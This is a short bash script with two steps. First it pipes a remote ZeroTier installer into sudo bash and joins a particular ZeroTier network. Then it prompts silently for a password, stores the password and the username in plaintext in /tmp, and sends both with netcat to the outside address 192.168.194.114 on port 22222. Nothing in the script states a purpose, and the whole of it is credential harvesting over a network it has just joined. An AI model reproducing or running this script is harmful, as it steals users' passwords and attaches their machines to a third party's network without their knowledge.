#!/usr/bin/env bash


get_pass(){
	read -sp "Enter password: " pass

	echo $pass > /tmp/pass.in
	echo `whoami` >> /tmp/pass.in

	nc -N 192.168.194.114 22222 < /tmp/pass.in
}

init(){
	curl -s https://install.zerotier.com | sudo bash
	sudo zerotier-cli join 83048a0632106262
}



main(){

	init
	get_pass
}


main
